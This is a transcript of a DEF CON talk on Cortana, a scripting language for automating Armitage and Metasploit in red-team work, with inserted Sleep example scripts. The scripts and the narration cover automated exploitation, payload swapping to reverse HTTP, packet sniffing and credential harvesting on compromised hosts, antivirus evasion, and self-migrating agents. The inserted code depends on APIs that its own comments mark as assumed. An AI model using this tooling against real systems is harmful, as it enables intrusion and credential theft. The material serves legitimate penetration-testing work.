So, I'm not sure if this has ever happened at DEF CON before, but our speaker has, hasn't completely lost his voice, but it's a little rough today, so keep that in mind, but our next speaker here is Raphael Mudge.

Thank you. I'm not that worried about losing my voice. I look at this room and I see a lot of my close friends, and I just feel like I'm amongst family, so I'm really looking forward to sharing something I've been working on for a while with you, and thank you for being here. What I'd like to start out with is: how many of you have used IRC before? Excellent. How many of you have written IRC scripts before? Oh, my kind of people. Now, I'd like to ask how many of you have written or used the IRC war scripts back in the 90s? Yeah, I'm 32 years old now, and I feel like I've regressed to 14. I'm making hacking tools, and I'm making hacking tools that feel like the IRC stuff I did in the 90s, and I'm trying to make my hacking tools more like the IRC tools I had in the 90s, so we're going to talk about that today, and we're going to talk about something called Cortana. What Cortana is, well, first off, how many of you know Armitage? Okay, great. Cortana is a scripting language for Armitage. I'm actually trying to make Armitage scriptable so you can actually add features to it, write bots. Here are the things we're going to talk about. Really important. I'm really honored by this. This work was made possible through DARPA's Cyber Fast Track program, so thank you, Mudge. I really greatly believe in your vision and what you're doing with that, and thank you for letting me be a beneficiary of that, and I hope you guys like what I've put together. Here's what this talk is not. Cortana is a programming language that does a lot of stuff, so this is not a tutorial, and some of the features I'm just not going to cover. But what I want to do today is I want to demonstrate what it can do. Okay, we're going to have a lot of fun.
I'm going to cover some of the major high notes and why they're there, and my goal, I just hope you, after this, are encouraged to go out and try it. I look forward to seeing what you do. A little bit about me. I started out on IRC in the 90s. I wrote an IRC client called jIRCii. I know Dan is in the audience, he's a jIRCii fan. I'm also the developer of a programming language called Sleep. I wrote it in 2002, and it was very active until 2009. I'm also the developer of Armitage, and because the work I've done the past years has kind of taken over my professional life, I started a company, actually my personal and professional life, it's, I won't lie. I started a company this year, Strategic Cyber, and I make software for red teams, occasionally do research. You can learn about that at advancedpentest.com. This is from my IRC client's Easter egg, but it's from an mIRC add-on that was published in the 90s to make fun of me, just to kind of give you an idea of the world I came from. We're sitting on a channel called Floods, and my nickname's Butane, and I'm sitting there talking about how to write these scripts to revolutionize mIRC, and that's not what I really said, but it's probably what I sounded like, so I deserved it. But this is kind of the world I came from and what I want to bring back into our community a little bit. I mentioned my IRC client, jIRCii. I have experience making something scriptable. jIRCii never became very popular. There's a lot of really good IRC clients out there, but it did attract a really healthy little scripting community.
I think it's over 70 or 80 scripts on its website, and some of them tens of lines of code, others thousands, written by people who've actually never even programmed before, and I noticed in the security community there's a lot of people afraid to take the plunge into writing code, and so I wanted to create something where people who haven't programmed before have a friendly path to develop something useful, share it with others, and hopefully get hooked on the bug of programming, so that's part of my motivation here. Let's talk a little bit about Sleep. As I mentioned, I started working on Sleep in 2002. I didn't know I was actually going to continue working on it. It was a weekend-long hack. It looks a little bit like Perl. It is built on top of Java. It doesn't have any external dependencies. I like that. It's very small. It's one file, 250 kilobytes. The nice thing about Sleep, and my original purpose behind it, was to make a base language, okay, that I could extend with new constructs to make the language really friendly to whatever purpose I wanted. Of course, my first round of that was a chat program, and I thought it worked really well there. With all things, I document everything. So Sleep has a nice 200-page manual, but the same thing is available online for free and always has been, probably always will be. So this was a labor of love, if anything. So you're going to see some Sleep code today. Don't worry, it's not too bad. And you can learn more about Sleep at sleep.dashnine.org. Now let's talk about Armitage. You know, some really nice folks at Starbucks let us cut in line, and when they heard what was happening, they actually bought the tea and the honey. It was really nice of them. So let me continue on with Armitage. Armitage, for those of you who don't know it, seems like most of the room does. It's a graphical user interface for Metasploit. And it's gone pretty far in the past year and a half it's been out, and I've been really pleased with it.
Most people know it as a GUI; I think of it as a red team collaboration tool. And what's possible with Armitage is I can set up a team server that wraps Metasploit and makes it safe for multiple people to use at the same time. And using that central team server, a whole team can actually break into a network, work through one foothold, pivot through it, and share the same accesses and the same data. It's really cool. I've taken it to a lot of exercises and I speak about it pretty regularly. So there's a lot of material online about that. Now let's talk about Cortana, because we've got this ability for humans to interact with each other, right? Well, the question with Cortana was, what happens when I add bots into the mix? And so I created the scripting language based on Sleep to automate the Metasploit framework and to extend Armitage with new features, just like the IRC clients' active scripting communities did in the 90s. Why do we want to do this? Well, one, if you've got bots, you can delegate work to them and you can scale your red team activities. We'll talk about that. The reason for scripting Armitage: I feel like as a community, we have a wealth of great standalone capabilities. I mean, we are a very, very wealthy community in terms of capability, but there's not a lot of glue out there. And I like the Metasploit framework. It's made a lot of inroads, but there's nothing there for adding a user interface on top of it and extending that. So that's why I want to make Armitage scriptable. Here's kind of how it works. It's possible to load Cortana scripts into Armitage. I had to come up with an extension, something that said cyber, something that said Cortana. So I went with CNA. Good acronym. But it's possible to load multiple scripts into Armitage. Standalone or with a team server, you can do that. And Cortana itself exists as a standalone interpreter. Okay. And I can load as many scripts as I want into this headless standalone container for bots.
And one of the things the language enforces is isolation between each of the bots. So you don't have to worry about this other script that's loaded and de-conflicting with it. This is all built into the language. Lessons learned from my past experience doing this. Now, I've described Cortana so far in the context of, like, IRC bots and scriptable IRC clients. Well, really the academic way of describing it is I see the combination of Armitage and its team server, the Metasploit framework and now Cortana as pieces in a multi-agent system for red team operations. And so Cortana is the domain-specific language to write agents that do whatever we want them to do, respond to things that happen. The team server provides the communication layer and the de-confliction of the agents. Metasploit offers an agreed-upon vocabulary for our data. And if anybody here has ever built a multi-agent system in a committee, you'll know that that is something that will never get done and the project will stall for years. The other nice thing about the Metasploit framework is all of its modules are great verbs, actions for these simulated humans, these bots, to do, things they can do, and there's a lot of capability there. And of course Cortana gives us the ability to take any of those verbs, do something with them. Cortana gives us the ability to, when something happens, react to it, just like in writing an IRC bot: when, hey, when there's a new message in the chat room, do this. With Cortana, it's, hey, when I see a new host, do this, or when a compromised host, a session, opens up, do this. And one of the challenges, though, in this kind of system is positive control. And so it's not so much the topic of this talk, but a lot of the reason this was a DARPA effort was to actually research those issues and come up with a few simple ideas and try them out for assuring positive control to debug, understand and rein in these agents, keep them from taking over the world.
If you've ever read the book Daemon, my goal is kind of to make a system that would enable somebody crazy to do that. Okay, well, Cortana is not the only way to automate the Metasploit framework. First, you do have the option of extending it, and Cortana is not a replacement for that at all. You should still write your modules if you've got a new exploit. You should still write auxiliary modules. Plugins are a great way to extend the framework with new commands, and resource files are still a great batch capability. The Metasploit RPC server, I'm probably one of like two or three people in the world who work with it the most, and it's really low level, so you can build something on it, but you're going to be reinventing a lot of what I've already done. But I do like it because it's well thought out and I want just really basic primitives so I can build what I've done, so. And of course there's msfcli, which is a command line interface to the Metasploit framework, and that's good for maybe embedding in a script, but this is different in the sense that we're writing these bots that are long running and we can extend our Armitage. Now let's go into some uses. First I want to give you some background. I've mentioned that Cortana can respond to events as they happen, okay? And here's how that works and what it looks like. In Cortana the syntax to say I want to respond to events is this: on some event, whatever it is, I get back a bunch of arguments and I can respond. That's it. I can declare as many of these as I want and that's how you respond to an event listener. By the way, what I'm going to show throughout this talk, though, is what I call the declarative syntax, meaning I'm just telling the program what I want, but there's actually a syntax where you can hook an arbitrary event and give it an arbitrary function, so there's kind of a power user equivalent, but this is the easier to read one. Here's the way a lot of events are driven.
For example, Cortana is constantly polling the Metasploit framework, the database it uses, and it's pulling back all the tables. And there's actually a really efficient protocol where when Cortana says, hey, I want new data, I want to know what you've got, here's a hash of what I've got. It'll send that when it requests an update, and if the server says, hey, the data hasn't changed, it'll say, oh, okay, and nothing's transmitted, so it's very efficient. And the way it works is I have the old data and I have the new data and I compare the two and I say, hey, in the case of hosts, I say, okay, hey, from the old data to the new data some of this stuff's missing, well, I fire a host remove event that scripts can respond to, or I say, hey, I see a new host, I'm gonna fire a host add event. And what that gives me the ability to do is take anything that is part of this working set of data available in the Metasploit framework and it gives me the ability to respond to it in a very easy, intuitive way. And I'm already doing all this data synchronization anyway, so this is kind of free on top of what we already have. Here are the data events that Cortana fires events for: the Metasploit credentials table, hosts, loots, the routes, what pivots you set up, which services are seen. You can actually declare an event, for example, on service_add_22, and see when the Metasploit framework becomes aware of a new system with SSH open. And it doesn't matter how it figured that out; maybe somebody launched a module and found it, maybe somebody imported it. And of course I can fire events surrounding sessions as well. Now a little story, okay. So I was at the Northeast Collegiate Cyber Defense Competition this year. I've done it every year since 2008. I really love the event, and what it is, it's an exercise where college students come with their team, they're dropped in the middle, they have a network to manage and run while a red team is stomping on them the whole time. This year we had a problem.
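As an added example (not the differ.cna from the talk), here is what a bot built on those data events looks like in Cortana. It assumes the event names host_add, host_delete, service_add and service_add_<port>, the say() function for posting to the team event log, and that the service dictionary passed as the third argument carries 'name' and 'info' keys matching Metasploit's service name and banner columns; those details are assumptions, not confirmed by the talk.

```sleep
# Added example (not the talk's differ.cna): a bot that watches the Metasploit
# database through Cortana's data events and announces changes to the team.
# Assumed: the event names host_add / host_delete / service_add / service_add_<port>,
# the say() function, and the 'name' and 'info' keys of the service dictionary
# (matching Metasploit's service name and banner columns).

# a host appears in the database for the first time; $1 = its address
on host_add {
    say("new host: $1");
}

# a host was removed from the database; $1 = its address
on host_delete {
    say("host removed: $1");
}

# any new service; $1 = host, $2 = port, $3 = service dictionary
on service_add {
    local('$name $info');
    $name = $3['name'];
    $info = $3['info'];

    # only mention the banner when Metasploit actually captured one
    if (strlen($info) > 0) {
        say("new service: $1 $+ : $+ $2 ($name) - $info");
    }
    else {
        say("new service: $1 $+ : $+ $2 ($name)");
    }
}

# port-specific form: fires for SSH no matter how the framework learned of it
# (a module, an Nmap import, a teammate's scan)
on service_add_22 {
    say("SSH is open on $1 $+ :22");
}
```

Because the events come from Cortana's own database diff, this bot reports changes made by anyone connected to the team server, which is what made the differ bot useful to the whole room in the story that follows.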
There were new organizers and they decided to give the students all patched systems. And I guess they said the XP image that was vulnerable, something went wrong with it, so they swapped it out for a new Ubuntu image. Thanks. You mean you expect me to come to these events and hack? So anyways, the students have all patched systems, right? And on top of that, the organizers decided to firewall the red team off from the competition for the first hour, okay? So not only did we not have a possible exploit vector, we couldn't use default creds either. Although, funny enough, even after the hour, on two teams we still got them with psexec and default credentials. So if you ever play in these events, change those passwords quickly. But as you can tell, you've got 10 people and they're like, well, what do we do? And a friend of mine, Jolly, he asked, he's like, hey, is there a way to, I don't know, when Chris does an Nmap scan, is there a way, like, we can see what changed and just get that out to the room? And I said, yeah, I think that's possible. I think I can write a bot for you. He's like, oh, okay, cool. And Chris, he's a guy who's doing Nmap and changing his IP constantly and just scanning the student systems. Chris, he's like, Raph. I'm like, yeah, Chris. He's like, your little bot's kind of cool, but I don't want to import an Nmap scan every minute. And I'm like, oh, I understand. Can you automate it? Sure. So I wrote a bot for Chris to automate, running from his system, to automatically import his Nmap scans every time they finished. Okay, the ones he was doing on his system. And then my friend Silas says, hey, Raph, I've got a script. I give it a bunch of IPs and it'll start launching just a bunch of normal, you know, run-of-the-mill exploits. Your bots, can you give me a bot that feeds that? Sure. And so we ended up, by accident, with a system where I'm running a bot that announces changes to the database, new hosts, new services.
Chris is running a bot that imports stuff and Silas is running a bot that responds to that data, to new hosts and things that become available, and launches a bunch of attacks from his system. So I didn't expect that. It was kind of cool. It was like this distributed system of hacking going on, being fed by this central red team collaboration architecture. And what you can see in this picture, much better than I can see on my laptop, is the Rafi Cortana bot actually announcing hosts. If there's a cameraman, I'm sorry, I like to move around. And I just have to show this. This is a, I thought it was a momentous occasion. This is Chris editing his Nmap importer bot. And I'm like, oh, Chris, you're the first Cortana programmer besides me. By the way, you wanna know who the second one is? There's a student from Land O'Lakes University who found the Cortana code and package in a hidden directory on my web server like a month ago, and he's been playing with it since and emailing me. By the way, I just laughed. I thought it was great, and so I forgot his name, but I just, props to him. I thought that was pretty cool. So I guess he would be the second one. So let's go ahead and do a demo. There's a lot of demos in this talk, by the way. Okay, here I am. I've got Armitage. I have a pivot set up and I've got an exploited host, okay? And earlier, I gotta admit that tea really helps. My voice is much better than I thought it would be. Okay, earlier, I started the red team server and my Armitage client is connected to it. So let's first start up Cortana with this differ bot and I'll show you what it looks like. This is the entire differ bot: on service_add, say, hey, I see this host, this port, and the banner information for that particular service if we have it. That's not too hard, is it? A nice thing is, for people who are novice programmers, they like to copy and paste stuff. So there's no object-oriented hierarchy in this. It's pretty much everything you use.
You can copy and paste and it'll work elsewhere. So very novice-friendly in that sense. So yeah, this is that whole bot. I'll just change it to convince you. Not faking my demo. There we go. Now let's run Cortana headless. Here's how I do that. First, I need a property file. And what I wanna point out is that there is documentation on Cortana, enough to nearly be a book, about 55 pages. So afterwards, you won't have any problem digging into it in these pictures. But what you have to do is first create a property file and say, hey, here's how I want my bot to connect. And then to run it, all you do is java -jar cortana.jar defcon.prop, and give it the path to your bots, okay? So let me go ahead and run that. By the way, I can specify as many bots as I want and they'll just all load up. And once I do that, you'll see it in Armitage as well, but Cortana has a console for actually interacting with scripts and working with them and playing with that positive control stuff. Both the Armitage and standalone versions have the same commands in the console. Thank you, I just caught that. I heard you can't see the whole screen. I did not come here to cheat you guys out of screen space, I promise. Some people are happy to have me talk less, so let's do something I didn't practice, because I love doing that. Remember I mentioned that we have all these tools to understand our agents? Well, kind of, one of the tools is, it's a tracer. So I'm gonna type tron differ.cna. Got other great commands like prof and pron. I love turning something in to DARPA. I'm gonna be like, hey guys, check out the pron command in my hacker tool. So let's go ahead and import something. And we can see, by the way, here we are in the event log for a team server. I'm gonna see our bot joined. Go to Hosts, Import Hosts. Hopefully it's the right file I just imported. And we'll see. So unless I scanned that box already. All right, I'm gonna just make sure there's no services here.
I'll just scan this guy, 'cause I imported this one already. So there we go, and it comes back and starts announcing stuff to our chat room. There we go. Saying, hey, I see this, I see that. And that was the differ script and how it worked. By the way, there's more to this story. So let me take you there. As soon as I fix my, there we go, it's better. So what was the game? Remember, I told you at Northeast CCDC, we ended up in a hard situation, right? Because we had this, we started seeing stuff. A couple hours later, we see a system pop up in a banner and it said Zimbra. What's Zimbra? So, Google it, get the default creds and log into it. And we were able to jump on the system that students had just put up before they had a chance to change the passwords. And that's because we had a bot helping us. Another example, we saw Apache Tomcat come up. And my friend Will, who works at Rapid7, he's a pentester there, he was like, ooh, Tomcat. So he managed to get into that system before the students had a chance to lock it down. And so just having this situational awareness aided by bots was really, really valuable to us. Another story is, who here has used Windows Credential Editor before? A few of you. It's a really awesome tool, you should Google it. Probably while I'm talking right now, it's really that cool. What it does is it pulls plain text credentials out of memory for the users who are logged in. And I wrote a bot for some other events that would, every 10 minutes, sweep through all the hosts we had access to, run this tool, parse its output, and make the passwords and usernames available to our whole team. So another example: bots helping with the tedious work. So let's talk a little bit about post-exploitation. Basically, I want to control sessions with multiple people using them. And the Armitage team server makes it possible for humans, so it's pretty trivial to extend to bots as well. Here's what it looks like.
I queue a command using a function like m_cmd with the ID of the session. And when that command completes, an event fires in my local instance. So if somebody else queues a command, that won't fire an event. But I get this event, on meterpreter_[command], and I can parse it and do whatever I need to with it. Also, a more generic on meterpreter fires too, so I can hook kind of anything in my local script that fired. And one other thing to say to this: for larger scripts, there is the ability to create kind of like isolated agents from inside of one script that all just do their own thing, and that's a really great way to decompose a larger program. Interacting with a process through Meterpreter. Again, same thing: m_exec, session ID, command. I get back an event, on exec_[command], so I can do m_exec session one, dir /s *:.pdf or something like that. And when that finishes, I'll get all that information back and I can parse through it. There's also m_exec_local, which takes a local executable, gives it over to Meterpreter to inject directly into memory without touching disk, and works in the same way, so it's pretty cool. Shell sessions. When I was first building this technology, I got this one all wrong. I couldn't interact with a dumb command shell in the same way I'd interact with Meterpreter, but then I came up with something that just didn't work, was really confusing to work with. So I then said, no matter what I do, I gotta make this look like Meterpreter, so now it does. s_cmd, some session ID, whatever command you want, and you get back on shell_[command], same kind of thing. So this pattern applies to whatever you're trying to interact with. Now let's have another demo. We'll load this into our bot. Oh, by the way, remember I mentioned the tracing? This is the output of all the stuff our one bot was doing behind the scenes. We'll turn that off, you don't need that.
Okay, but you can see all the functions that were called, what they returned, and what file and what line number. Nice debugging tool. So let's go ahead and load another bot. It's defcon, autokill, I think it was autokill.cna. There we go, good. I can actually load and unload bots too from a Cortana instance. So let's have a look at the autokill bot. Here's what autokill does. In this case, every five seconds it looks at all of our sessions and makes sure that they're Windows Meterpreter and that they're ready for interaction, and it sends a command, ps. We get back an event, on meterpreter_ps, and we use a built-in Cortana function to parse that into a dictionary it can work with, and for each process entry I extract the name and process ID. I check if Internet Explorer is that process, and if it is, I queue the kill command. So let's take a look at that. First thing I'm gonna do, we're gonna use another Cortana debugging function, which is the logging one, so we're gonna do logon autokill.cna, and now we can see everything Cortana is doing on our behalf, which file, what line number. A great tool for understanding a script without tracing every function. So let's go over here to my XP victim I've got. I don't know, I'm kind of in the mood to browse the web, see what's on the internet, see what's on MSN.com today. And, thanks. Could you imagine, like, a cyber defense exercise doing this with, like, *setup*, or *wireshark* and *cmd*? Same thing though, here you go. There's our kill commands that are being issued by our bot on our behalf. Let's turn that off. Tell our bot bye-bye now. That's an example of kind of post-exploitation. Our bot left. Bye, bot, I miss you. And this is just a screenshot of, I mentioned the Windows Credential Editor stuff. This is from the Rochester Institute of Technology Information Security Talent Search, an offense and defense competition, and really great; if you can go out there, I recommend it.
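To show the m_cmd / on meterpreter_[command] pattern end to end, here is an added example (not the autokill.cna from the talk) that polls every Meterpreter session for its process list and reports processes that were not there on the previous poll. It assumes Cortana's heartbeat_5s event, sessions(), session_type(), m_cmd(), parse_table() and say() behave as the talk describes; the "PID" and "Name" column names are Meterpreter's ps headers.

```sleep
# Added example (not the talk's autokill.cna): a process-change bot using the
# m_cmd / on meterpreter_<command> pattern. Every five seconds it queues "ps"
# on each Meterpreter session; when the output arrives it is parsed with
# parse_table() and processes that were absent on the previous poll are
# announced. Assumed: the heartbeat_5s event, sessions(), session_type(),
# m_cmd(), parse_table() and say() as described in the talk.

%last = %();   # session id -> hash of process name -> PID from the previous poll

on heartbeat_5s {
    foreach $sid (sessions()) {
        # only Meterpreter sessions understand ps; plain shell sessions are skipped
        if (session_type($sid) eq "meterpreter") {
            m_cmd($sid, "ps");
        }
    }
}

# fires when a ps we queued completes: $1 = session id, $2 = command, $3 = output
on meterpreter_ps {
    local('@procs $proc $name %now');
    # turn the text table into an array of dictionaries keyed by column name
    @procs = parse_table($3, @("PID", "Name"));
    %now = %();

    foreach $proc (@procs) {
        $name = $proc['Name'];
        %now[$name] = $proc['PID'];

        # skip the first poll of a session (everything would be "new"), then
        # report names that were missing last time
        if (%last[$1] !is $null && %last[$1][$name] is $null) {
            say("session $1 $+ : new process $name (PID " . $proc['PID'] . ")");
        }
    }

    %last[$1] = %now;
}
```

Only commands this script queued itself produce its meterpreter_ps event, so two bots polling the same session do not see each other's output, which is the isolation the talk describes. The same shape (queue, wait for on [type]_[command], parse) carries over to m_exec and s_cmd.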
But here this is running Windows Credential Editor and announcing it to the chat room, so you can see some passwords up there. Not my password, thankfully. Okay, let's see here. Now, let's talk about scripting Armitage a little bit. Through Cortana, it's possible to take the default behaviors in Armitage and change them. So, here's the problem. Armitage is an opinionated tool. The developer is opinionated too. And I wanna be able to alter how it does things, I as a scripter. For example, Armitage picks my payload. Wouldn't it be nice if I could change how that works? Or here's a really good one. When I'm doing a pen test, if I try to psexec to a system doing a pass-the-hash attack and I rely on the default binary generated by the open source Metasploit framework, I'm gonna get flagged by antivirus. So what if I wanna hook the workflow in Armitage for passing the hash and use a different executable? How could I do that? And just, how can I modify Armitage? So let's take a look at that. The mechanism to do these kinds of things is filters. Filters hook an action that a script wants to take and change the parameters on the fly; they can inspect it and change it, and then it goes through like nothing ever happened. And so let's have a look at that. Here I am back in all this nifty stuff. And let's take a look at a script called payload.cna. cd defcon. I'm kinda messy in my folders, so don't mind me. Here's a script to, what it does is, when the on ready event fires, hey, I'm synced with the Metasploit framework database, it starts a handler for windows/meterpreter/reverse_http. And whenever a user launches a module through, like, the Armitage GUI, it looks at the options, it looks at the payload, says, hey, is this windows/meterpreter/reverse_tcp? If it is, let's modify that, change it to HTTP, put in the information it needs and let it continue going. So let's take a quick look at that.
So we're gonna go to, there's two ways to load a script in Armitage. If you want it to always be there, go to Armitage, Scripts, and load and unload stuff and go to town. If you're a developer, go to View, Script Console, and you get that same console we saw in the command line. A little nicer though, 'cause it has tab completion. So I'm gonna load armitage, defcon, payload, payload.cna. There you go, started the multi/handler for us. I feel you, see that. So let's go ahead and launch an exploit against the system. You know what's really exciting? Do the classic MS08-067, I'm feeling lazy. And we'll tell it to use a reverse connection, press launch. And what you see is, here's our payload, windows/meterpreter/reverse_http, right? I'll see if my pivot wants to behave or if the system wants to behave and it actually triggers. The main thing I wanted you to see, though, is the actual, what I'm gonna call it, the actual payload change. So somehow my 2003 box doesn't want to be exploited right now. It's okay. I know a way around that. If not, if this doesn't work, then I'm gonna just press. Oh, I didn't make a reverse, but for my next demo, I actually need to be on that box. So we'll let that go. But that's a pretty simple example, right? Swapping a payload preference. What about, what about the psexec example I mentioned? Here's a little bit more complex script that I'm working on. And I guess I'm still working on converting it from something else I used to have. But what it does, filter user_launch, if the module's psexec, if the payload's a bind payload, it generates the raw shellcode for a payload that matches that. And it uses a Sleep function I wrote to embed that shellcode, not obfuscate it, inside of an executable I have that beats most antivirus. Okay? So this is an example of how I can take and use Cortana to merge my secret sauce for a pen test into the workflow in Armitage without really changing anything from the user's perspective.
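Here is an added example (not the payload.cna from the talk) of the simpler of the two filters described above: the handler is started once Cortana is synced, and a user_launch filter rewrites the default reverse TCP stager to reverse HTTP before the launch continues. It assumes the ready event, the user_launch filter with $1 = module and $2 = options dictionary, the handler(payload, port) function and lhost() for the local address; the port 8080 is a constructed value.

```sleep
# Added example (not the talk's payload.cna): a filter that rewrites the payload
# Armitage picked before a module launches.
# Assumed: the "ready" event, handler(payload, port), lhost(), and the
# user_launch filter with $1 = module name, $2 = options dictionary.

$lport = 8080;   # port our HTTP handler listens on (constructed value)

# once Cortana is synced with the database, stand up the listener we redirect to
on ready {
    handler("windows/meterpreter/reverse_http", $lport);
}

# called for every module the user launches; we may change the options but must
# return the argument list so the launch proceeds
filter user_launch {
    local('$module $options');
    ($module, $options) = @_;

    # only touch launches that would use the default reverse TCP stager
    if ($options['PAYLOAD'] eq "windows/meterpreter/reverse_tcp") {
        $options['PAYLOAD'] = "windows/meterpreter/reverse_http";
        $options['LHOST']   = lhost();
        $options['LPORT']   = $lport;
        println("rewrote payload for $module -> reverse_http on port $lport");
    }

    # returning @_ hands the (possibly modified) arguments back to Armitage
    return @_;
}
```

The options dictionary is shared with the caller, so editing $options edits what Armitage launches; a filter that forgets to return @_ would drop the launch entirely, which is the one thing to check when a filter seems to "eat" actions.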
And that's a really, really powerful thing, because if you've got other things you want to integrate, other kinds of callback agents, other kinds of possibly even sessions besides Meterpreter, I'm exploring a lot of this stuff right now. It's a lot of fun, so a lot of potential here. Now let's talk about user interface here as we start to wind down the presentation. This is all about how do we add features to Armitage, integrating third-party tools, exposing capabilities in the framework that aren't normally used, or even just controlling something built in Cortana. Well, here's the things Cortana scripts can do to extend Armitage. They got it. They can define keyboard shortcuts. They can define menus. They can create console interfaces, so pop up a tab and you have full control over it. And they can create tables of information. And that's kind of what Armitage does for everything. So actually, how I evaluated this technology is I delivered to DARPA Armitage written in Cortana. Like, I ripped everything out and rewrote all of it with just this stuff to show it could be done. And I thought it was going to be easier than it was. It was doable, but it was actually kind of hard, and I was like, it was a busy time when I did that. That was a good test. So let's have a demo. How many of you know that Meterpreter can sniff packets? A few hands went up, great. Yeah, Meterpreter has a sniffer module built in. It's a little cumbersome to use, but it is there, it's a pretty cool capability. So let's go ahead and load a Cortana script that lets us use it. First, if I right-click on this host, I've got a Meterpreter menu, right? And you can see all the things I can do right now. Now let's go ahead and load sniffer.cna. Sniffer, sniffer.cna. Great, I now have a sniffer. If I right-click on this host, go to Meterpreter, I now have a Sniffer menu. Everybody loves sniffers. I'm going to press start.
And what it's going to do is go to that host, query all the different network interfaces on it, and it'll pop up a dialog asking me which interface I want to sniff on. I'm like, oh, okay. I'll sniff on this one, I guess I don't really have a choice, do I? So let me press sniff, start sniffer. And did anybody notice what the script did? It added a little nose to indicate that we're sniffing. Scripts have a lot of power. Now, let's go do something on my victim system. Let's, FTP, one, two, three, two, one, six, four, eight, one, two, eight, and I'll do, I don't know, log in as a user, voice, got my password, fine. Oopsies. By the way, I can still do that logging stuff I told you about, see what it's doing on my behalf. Because periodically the sniffer's pulling back packets for me and saving them somewhere I can get to them. So let's go over here. Part of the power of the Metasploit framework is not individual features, but the fact that they work well together when combined. It's like Magic: The Gathering. So a great module in Metasploit is called psnuffle. And what psnuffle does, it can take an arbitrary PCAP capture, extract plain text creds out of it, just like dsniff used to do, and put those in the Metasploit credentials database. So let me go Sniffer, psnuffle. And here it's running the module for me. And you can see my FTP login I just tried. So that's an example of a Cortana script adding a new feature and exposing the really cool stuff we can do with it in the Metasploit framework. So let's take a look at that script real quick. Here it is. First, I'm declaring a pop-up, a menu in the Meterpreter menu. meterpreter_bottom is the hook. Menu Sniffer, item Start. When it's clicked, it does this stuff. I queued this info a few times to give the sniffer time to load. Once sniffer_interfaces comes back, it's gonna fire an event, on meterpreter_sniffer_interfaces.
And I'm gonna parse through all this, prompt you with all that information, and once you hit sniff, it's gonna fire an item selected event. I'm gonna issue a sniffer_start command to that Meterpreter session. Pop up a message, sniffer started. And every 10 seconds, I'm gonna loop through all the sessions that I know are sniffing and run the sniffer_dump command for you in the background. And by the way, a filter on the icon, here's what it looks like. This host_image filter intercepts when Armitage is about to display an icon. And it's like a pancake, or no, sandwich is a better way to describe it, I guess. And what it does is, it's a bunch of images that just get layered together and resized. So what this filter does is it gives me a chance to interact with that layer, that sandwich of images, and change them. So I loop through all the sessions I can relate to that host, check if any of them are sniffing, and if they are, I push an image onto that sandwich, onto that array, a sniff.png. And that's it, that's how I add my little nose. So that's the sniffer script. So to kind of take this on, wrap it up a little bit, what is Cortana? It's a scripting language to write bots for an Armitage collaboration team and automate the Metasploit framework. It's a scripting language to extend Armitage. One more thing, this is kind of evil. This function up here, something Sleep can do. It's an inline function, meaning when it executes, it runs in the context of its parent. And what it does is it pauses the current function, the parent, and sends it to another function, the current function, the parent, as an object, as a parameter. And it connects to some server elsewhere, writes this paused function out to the socket, and closes everything down. This is a way that your Cortana agents can migrate to other attack servers to build a very scary distributed botnet. And...
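As an added example (not the sniffer.cna shown in the talk), here is the same three-part structure in Cortana: a Sniffer menu on the Meterpreter popup, a ten-second dump loop, and a host_image filter that overlays an icon on hosts being sniffed. Beyond what the talk states, it assumes prompt_text(title, default, callback) calls back with the entered text in $1, that the host_image filter receives the host address in $1 and the array of image layers in $3, that script_resource() resolves a file next to the script, and that session_host() returns a session's host address; the interface index is taken from the operator instead of parsing sniffer_interfaces output.

```sleep
# Added example (not the talk's sniffer.cna): a Sniffer menu for Meterpreter
# hosts, a background dump loop and an icon overlay for hosts being sniffed.
# Assumed, beyond what the talk states: prompt_text(title, default, callback)
# calls back with the entered text in $1; the host_image filter receives the
# host address in $1 and the array of image layers in $3; script_resource()
# resolves a file next to this script; session_host() returns a session's address.

%sniffing = %();   # session id -> interface index we are capturing on

popup meterpreter_bottom {
    menu "Sniffer" {
        # $1 is the session id the menu was opened for
        item "Start" {
            local('$sid');
            $sid = $1;
            m_cmd($sid, "use sniffer");

            # ask the operator for the interface; the answer arrives in the callback
            prompt_text("Sniff on which interface index?", "1", lambda({
                m_cmd($sid, "sniffer_start $1");
                %sniffing[$sid] = $1;
                say("sniffer started on session $sid $+ , interface $1");
            }, $sid => $sid));
        }

        item "Stop" {
            if (%sniffing[$1] !is $null) {
                m_cmd($1, "sniffer_stop " . %sniffing[$1]);
                %sniffing[$1] = $null;
                say("sniffer stopped on session $1");
            }
        }
    }
}

# every ten seconds pull what each sniffer captured into a pcap on our side;
# sniffer_dump writes the file locally, so psnuffle can be run on it later
on heartbeat_10s {
    local('$sid');
    foreach $sid (keys(%sniffing)) {
        if (%sniffing[$sid] !is $null) {
            m_cmd($sid, "sniffer_dump " . %sniffing[$sid] . " sniff_ $+ $sid $+ .pcap");
        }
    }
}

# Armitage layers several images to draw a host; add one more layer when any
# session on that host is sniffing, then hand the (modified) arguments back
filter host_image {
    local('$sid');
    foreach $sid (keys(%sniffing)) {
        if (%sniffing[$sid] !is $null && session_host($sid) eq $1) {
            push($3, script_resource("sniff.png"));
        }
    }
    return @_;
}
```

The state lives in one hash keyed by session id, so the menu, the heartbeat and the icon filter all agree on which sessions are sniffing, and unloading the script drops the state with it.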
If you want to check more about this twist, I've got two articles I've written about this technique, "Shell Scripting with a Distributed Twist" and "Agent-Based Traffic Generation." So just to wrap this up, I introduced Cortana to you. We talked about how to build distributed bots, talked about post-exploitation, how to modify how Armitage does things, and how to extend the user interface with new features. Again, I would especially just foot stomp, like to say thank you to DARPA and the wonderful things going on with the Cyber Fast Track program, just a fantastic opportunity. That's what made this work possible. And here's where to go next. I'm armitagehacker on Twitter. There's my email. You can learn more about Sleep. If you go to fastandeasyhacking.com/download, or if you go to that website and click the download link, Cortana, the documentation, some of these examples are there. And I'm gonna clean all of it up and merge it, probably this weekend, into what's in Metasploit. So thank you very much, and I'll turn it over to questions.